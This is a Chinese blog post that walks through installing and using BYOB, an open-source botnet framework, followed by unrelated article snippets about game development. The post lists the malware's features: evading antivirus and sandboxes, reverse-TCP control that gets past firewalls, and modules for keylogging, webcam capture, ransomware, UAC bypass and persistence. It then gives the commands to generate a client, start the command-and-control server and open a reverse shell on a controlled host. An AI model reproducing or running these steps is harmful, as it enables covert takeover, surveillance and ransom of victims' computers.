byob--建立自己的僵尸网络 原创 Snow狼 2018-10-16 14:13:21 博主文章分类:DDoS ©著作权 文章标签 byob 僵尸 网络 ddos 文章分类 网络安全 ©著作权归作者所有:来自51CTO博客作者Snow狼的原创作品,请联系作者获取转载授权,否则将追究法律责任 BYOB是一个开源项目,为安全研究人员和开发人员提供构建和运行基本僵尸网络的框架,以加深他们对每年感染数百万设备并产生现代僵尸网络的复杂恶意软件的理解,以提高他们的能力,制定应对这些威胁的对策。 它旨在允许开发人员轻松实现自己的代码并添加新功能,而无需从头开始编写RAT(远程管理工具)或 C2(命令和控制服务器)。 RAT的关键特性是任意代码/文件可以从C2远程加载到内存中并在目标机器上执行,而无需向磁盘写入任何内容。 ———————————————————————————————————————— github链接:https://github.com/malwaredllc/byob ———————————————————————————————————————— 使用有效负载,远程导入生成完全不可检测的客户端 远程导入:从服务器远程导入第三方软件包,而无需将其写入磁盘或下载/安装它们 不写入磁盘:客户端从不向磁盘写入任何内容 – 甚至不是临时文件(进行零IO系统调用),因为远程导入允许将任意代码动态加载到内存中并直接导入到当前正在运行的进程中 零依赖(甚至不是Python本身):客户端只运行python标准库,从服务器远程导入任何非标准软件包/模块,并可以使用独立的python解释器编译成为任何平台/格式化的可移植二进制可执行文件体系结构,允许它在任何东西上运行,即使目标主机上缺少Python本身 只需单击一下即可添加新功能:./byob/modules/当您的命令和控制服务器运行时,您要复制到目录的任何python脚本,模块或程序包将自动变为可远程导入并可由每个客户端直接使用 编写自己的模块:./byob/modules/目录中提供了一个基本模块模板,使您自己编写模块成为一个简单,无障碍的过程 在不增加文件大小的情况下运行无限模块:使用远程导入添加无限功能,而无需向客户端的文件大小添加单个字节 完全可更新:每个客户端将定期检查服务器是否有可用于远程导入的新内容,并且如果添加/删除了任何内容,将动态更新其内存资源 平台无关:一切都是用Python(与平台无关的语言)编写的,生成的客户端可以选择编译成可移植的可执行文件(Windows)或捆绑到独立的应用程序(macOS)中 绕过防火墙:客户端通过反向TCP连接连接到命令和控制服务器,这将绕过大多数防火墙,因为默认过滤器配置主要阻止传入连接 针对防病毒的反措施:通过阻止来自产生已知防病毒产品名称的进程来避免被防病毒软件分析 加密有效负载以防止分析:主客户端有效负载使用随机256位密钥加密,该密钥仅存在于与其一起生成的有效负载stager中 防止逆向工程:默认情况下,如果检测到虚拟机或沙箱,客户端将中止执行 模块 11个远程导入的开发后模块 Keylogger(byob.modules.keylogger):记录用户的击键和输入的窗口名称 屏幕截图(byob.modules.screenshot):截取当前用户桌面的截图 网络摄像头(byob.modules.webcam):查看实时流或从网络摄像头捕获图像/视频 Ransom(byob.modules.ransom):加密文件并生成随机BTC钱包以支付赎金 Outlook(byob.modules.outlook):从本地Outlook客户端读取/搜索/上传电子邮件 Packet Sniffer(byob.modules.packetsniffer):在主机网络上运行数据包嗅探器并上传.pcap文件 Persistence(byob.modules.persistence):使用5种不同的方法在主机上建立持久性 电话(byob.modules.phone):从客户端智能手机读取/搜索/上传短信 Escalate Privileges(byob.modules.escalate):尝试UAC绕过以获得未经授权的管理员权限 端口扫描程序(byob.modules.portscanner):扫描本地网络以查找其他在线设备和打开端口 Process Control(byob.modules.process):list / search / kill / monitor当前正在主机上运行的进程 核心 生成器和服务器使用的6个核心框架模块 Utilities(byob.core.util):许多模块使用的各种实用程序函数 Handlers(byob.core.handlers):请求处理程序以从客户端接收已完成任务的结果 安全性(byob.core.security):Diffie-Hellman IKE和3种加密模式(AES-256-OCB,AES-256-CBC,XOR-128) Loaders(byob.core.loaders):从服务器远程导入任何包/模块/脚本 Payloads(byob.core.payloads):反向TCP shell,旨在远程导入依赖项,包和模块 Stagers(byob.core.stagers):生成独特的有效载荷分级器以防止分析和检测 Generators(byob.core.generators):所有动态生成客户端生成器代码的函数 Database(byob.core.database):处理命令和控制服务器与SQLite数据库之间的交互 ———————————————————————————————————————— 安装: git clone https://github.com/malwaredllc/byob 下载完后进入boby目录里面 pip install -r requirements.txt 现在已经就是安装完了 client.py是生成客户端,server.py为服务端 python client.py --help |usage: client.py [-h] [--name NAME] [--icon ICON] [--pastebin API] [--encrypt] | [--compress] [--freeze] [-v] | host port [module [module ...]] | | Generator (Build Your Own Botnet) | | positional arguments: | host 服务器ip地址 | port 端口 | module 在运行时远程导入的模块 | | optional arguments: | -h, --help 查看帮助 | --name NAME 生成的文件名 | --icon ICON 图标(指定文件位置) | --pastebin API 上传有效载荷到pastebin(不是在c2服务器上托管) | --encrypt 用随机128位密钥加密有效载荷嵌入在有效载荷的阶段 | --compress 压缩生一个自解压的python脚本 | --freeze 将客户端编译为当前主机平台的独立可执行文件 | -v, --version 查看版本号 —————————————————————————————————————— (server.py的help就不解释了) 我们先生成一个客户端(本次试验没用模块) python client.py --name test(取名为test) 192.168.1.110(服务器IP地址) 4444(端口号) 现在我们就可以看到已经生成了python的后门程序,我们可以打开看一下 现在我们新开启一个终端 python server.py --host 192.168.1.110 --port 4444 (等待被控端运行***自动链接) 这时候我们在被控端运行生成的test.py 我们再回到服务器端就可以了看到已经链接到了 然后我们输入help查看帮助信息 [root @ /usr/src/byob/byob]>help bg [id] 后台会话(默认为当前会话) broadcast <command> 将任务广播到所有活动会话 clients 显示所有已加入服务器的客户端 debug <code> 直接在服务器上运行python代码(debug必须启用调试) exit 退出 help 查看帮助 kill <id> 结束会话 options 显示当前配置 query <statement> 查询 SQLite 数据库 ransom [id] 为比特币支付加密客户端文件和RANSOM加密密钥 results [id] 为客户端显示所有已完成的结果 (默认所有客户端) sessions 显示活动客户端会话 set <setting> [option=value] 更改当前配置 shell <id> 反向tcp shell会话 tasks [id] 显示客户端所有未完成会话 (默认所有客户端) webcam <mode> 从客户端的摄像头捕获图像或者视频 ———————————————————————————————————————— 查看到我的id是1,用户名是root且是管理员 [root @ /usr/src/byob/byob]>shell 1 正常查看ip地址 实验成功 ———————————————————————————————————————— 此脚本还在继续添加新功能,坐等 赞 收藏 评论 分享 举报 上一篇:kali扫描工具--vega 下一篇:ThinkPHP远程命令执行漏洞原理及复现 提问和评论都可以,用心的回复会被更多人看到 评论 发布评论 全部评论 () 最热 最新 相关文章 mongodb 怎么做地理索引的 MongoDB的地理空间索引是一种特殊类型的索引,它允许你针对包含地理位置数据(如经度和纬度)的文档执行高效的查询。这种索引类型使得MongoDB能够支持各种地理空间查询,例如查找接近特定位置的点、查找在特定多边形内的点或查找与特定几何体相交的点。MongoDB提供两种类型的地理空间索引: 2D索引:这种索引适用于平面地图上的点,它使用二维坐标系统来存储数据。2D索引适用于简单的地理空 空间查询 地理位置 空间索引 用C语言采集游戏网站数据并做行业分析 游戏一直深受90/00后的喜爱,有些人因为对游戏的热爱还专门成立了工作室做游戏赚钱,但是游戏行业赚钱走不好就会被割一波韭菜,那么现在什么游戏挣钱,什么游戏好玩认可度高?带着这样的问题我将利用我毕生所学,写了下面一段爬虫程序。 System 代理服务器 Threading 游戏 网游 使用Vue后怎么针对搜索引擎做SEO优化 在当今互联网时代,搜索引擎优化(SEO)对于网站的成功至关重要。而对于使用Vue.js来构建网站的前端开发者来说,了解如何进行针对搜索引擎的SEO优化就显得尤为重要 搜索引擎 Vue SEO 游戏外挂怎么做? 外挂,原指一切用来破坏游戏程序正常游戏数据和逻辑的工具或破解版。比如可以修改 游戏 人工智能 实现原理 数据 Java怎么做游戏 # Java游戏开发方案## 1. 引言Java是一种通用编程语言,它具有跨平台的优势,并且拥有丰富的库和工具,非常适合游戏开发。本文将提出一个基于Java的游戏项目方案,并提供相应的代码示例。## 2. 项目概述本项目旨在开发一个简单的2D游戏,玩家需要控制角色通过不同关卡,躲避障碍物并收集奖励,以获得最高得分。游戏基于Java Swing库进行界面设计和用户交互,使用Java图 Java java 碰撞检测 游戏是怎么做推广的 游戏是怎么做推广的大家好我是艾西,今天是我们的闲聊日记,大家都知道我是一直做游戏相关的事情,不管是开发、运营还是资源渠道等都是不可少的因素,那么在这长时间的积累下还是有一些直接的心得以及方式方法的。今天我们主要聊的是游戏的推广等,现在是流量为王的时代,这也是很多人比较难以开始下手的点。现在很多的游戏都请大牌的明星来代言,可想而知,这游戏的盈利能力和利润是有多强大!当然,游戏很多,但是普通小公司小团 自媒体 游戏推广 游戏服务器 服务器租用 驰网艾西 怎么做游戏打击感浅述 击感做出来。 简而言之,打击感从现 打击感 开发者 反例 复制粘贴 Javascript做游戏入门 js怎么做游戏 前言又过了三个月,咳咳咳……这次我决定录一个视频,如果不想看文字的朋友,可以看视频(点这里),内容和文字差不多。线上地址:http://cardgame.xiejingyang.comgithub:https://github.com/xieisabug/card-game正文首先来做攻击效果,也就是卡牌冲过去,再回来。这属于动画效果,我这里就不造轮子了,直接找一个现成的好用点的动画库,这里我用的 Javascript做游戏入门 Javascript 游戏开发 卡牌游戏 vue python怎么做游戏 python做游戏教程 使用Python写贪吃蛇游戏(pygame)本地路径:cd /D/Workspace/Python/teach-demo/03-snake-demo我们要使用Python编写贪吃蛇游戏,需要使用到pygame模块,即在PyCharm终端输入pip install pygame安装完毕即可。 在pygame有三个对象比较重要,分别是 pygame.display—设置场景显示,包括页面大小,页面标题 python怎么做游戏 python pygame 游戏 贪吃蛇 ios自己做游戏 ios怎么做游戏 该app为应用的功能为一个简单的考反应游戏纲要:-UIButton, UILabel, UIImageView 的运用;-利用rendom增加游戏可玩性;游戏说明:在按下开始游戏后,分为三盏的指示灯按照“黄”、“红”、“绿”的先后顺序各自读取相应的指示灯颜色图片文件,当黄灯亮后游戏使用随机变量产生没有规律的红灯持续时间,因为这样的红灯使玩家没法预计绿灯什么时候亮,所以按下油门的时间要看玩家的反应速 ios自己做游戏 游戏 xcode 控件 sed Javascript做的游戏 Javascript怎么做游戏 原文作者:Mitchum在我的上一篇文章中,我向大家介绍了一款使用 Javascript 编写的三连棋游戏,在那之前我也编写了一款匹配游戏。本周,我决定增加一些复杂性。你们将学习如何用 Javascript 编写扫雷游戏。我使用了 jQuery,这是一个有助于与 HTML 交互的 Javascript 库。当你看到一个函数的调用带有一个前导的美元($)符号时,这就是 jQuery 的操作。如果你 Javascript做的游戏 Javascript json 后端 ViewUI python怎么做app python怎么做游戏界面 学了一段时间的python,还是需要一些实践环节才能深刻理解,毕竟是个刚入门的小白,就先做点简单的小游戏项目来给自己一些鼓励吧,哈哈哈,不说了,上菜。创建一个背景为蓝色的python窗口 首先利用pycharm创建一个项目文件,命名方式最好取与所做项目相关的,见名知意。 先创建一个空的pygame窗口并设置其背景色(背景色可以自定义,颜色的RGB通过百度获取)main_color.py#导入模块s python怎么做app 游戏 python pygame 游戏开发 android游戏贴图 游戏贴图是怎么做的 烘焙贴图,其实就是将模型与模型之间的光影关系通过图片的形式转换出来,这样就形成了一种贴图,将这种贴图控制在模型上,可以得到一种假的但很真实的效果。烘焙的贴图有:法线贴图,OCC或ao贴图,转换贴图,高光贴图,固色贴图等。什么是贴图?贴图(texture)是一张不大的二维图像,它呈现了某个表面的最终信息。它被指定到线框多边形的表面,给予模型最终的外观。贴图的制作技巧是创建游戏真实度方面的关键因素。贴 android游戏贴图 游戏 游戏设计 游戏建模 模型制作 java游戏界面设置 java怎么做游戏界面 引言java作为后端的编程高级语言,功能齐全,表达力很强,并且目标效率高。我们可以用java来通过编写经典的五子棋游戏,来看看java中的基础知识在一个小项目当中的应用。思路任何一个程序项目,我们都应该从以下四个大的思路方向着手 用户交互部分五子棋下棋的界面所谓五子棋下棋的界面,其实就是指用户直接交互的五子棋棋盘,我们要用java来把五子棋的棋盘绘制出来这里放一块仅仅是棋盘的图界面 java游戏界面设置 游戏 java intellij idea Powered by 金山文档 Java游戏界面插图 java怎么做游戏界面 整体思路1.GUI画出游戏界面2.设置监听器,键盘控住游戏人物3.判断敌人是否被击败,游戏是否结束。代码实现:GameFrame类画出基本窗体:package ui;import javax.swing.JFrame;public class GameFrame extends JFrame { //窗体 public GameFrame (){ //创建构造方法 Java游戏界面插图 java Image i++ jquery制作翻牌小游戏 翻牌子游戏怎么做 0 游戏效果就是点击一个牌子时,该牌子和周围四个牌子也会相应发生变化,想办法让所有牌子都在同一面即为游戏胜利。1 fig界面和背景板这一段比较简单,主要是对界面和背景板的属性设置,我们采用编程的方式调用app designer控件:ddooggFig=uifigure('units','pixels',... 'position',[320 120 360 400],... 'Nu jquery制作翻牌小游戏 Text Source 控件 python编游戏脚本教学 python怎么做游戏脚本 使用 Python 的 PyGame 库写一个俄罗斯方块游戏的逐步指南在这篇教程中,我们会用 Python 的 PyGame 库写一个简单的俄罗斯方块游戏。里面的算法很简单,但对新手可能有一点挑战性。我们不会太关注 PyGame 的内部原理,而更关注游戏的逻辑。如果你懒得阅读整篇文章,你可以简单地复制粘贴文末的代码。准备工作Python 3。这可以从 官方网站 下载。PyGame。根据你正在使用的 python编游戏脚本教学 python pygame 开发语言 Python 手机游戏架构图怎么做 游戏架构分析 大纲导论支撑系统渲染引擎动画物理其他导论什么是架构?软件架构是一个系统的草图,软件架构描述的对象是直接构成系统的抽象组件。各个组件之间的连接则明确和相对细致地描述组件之间的通讯。在实现阶段,这些抽象组件被细化为实际的组件,比如具体某个类或对象。在面向对象领域中,组件之间的连接通常用接口来实现。什么是游戏引擎? 引擎 定义组件最重要的是功能的增加和分解常见组件的问题单 手机游戏架构图怎么做 游戏引擎 字符串 硬件驱动 游戏插件ios制作教程视频 怎么做游戏插件 今天我们来写一个魔兽世界插件,通过这篇文章 你可以写出一个自己的插件。魔兽世界怀旧服跟正式服 是差不多的 我们主要用到的技术是lua语言,魔兽世界客户端自带了一个LUA编译器,官方也是通过这个来实现很多UI的界面。一个最基本的插件包含2个文件,一个.lua,一个.toc文件。.lua文件是脚本编程的主要地方 toc是对这个插件的一些描述及版本号等信息。我推荐用VSCODE这款IDE对lua进行代码 lua 游戏客户端 版本号 lua脚本怎么嵌入游戏 lua脚本怎么做 Redis从2.6版本开始引入对Lua脚本的支持,通过在服务器中嵌入Lua环境,Redis客户端可以使用Lua脚本,直接在服务器端原子地执行多个Redis命令。 1. 创建并修改Lua环境为了在Redis服务器中执行Lua脚本,Redis在服务器内嵌了一个Lua环境,并对这个Lua环境进行了一系列修改,从而保证这个Lua环境可以满足Redis服务器的需求。Redis服务器创建并修改Lua lua脚本怎么嵌入游戏 redis Lua 服务器 Redis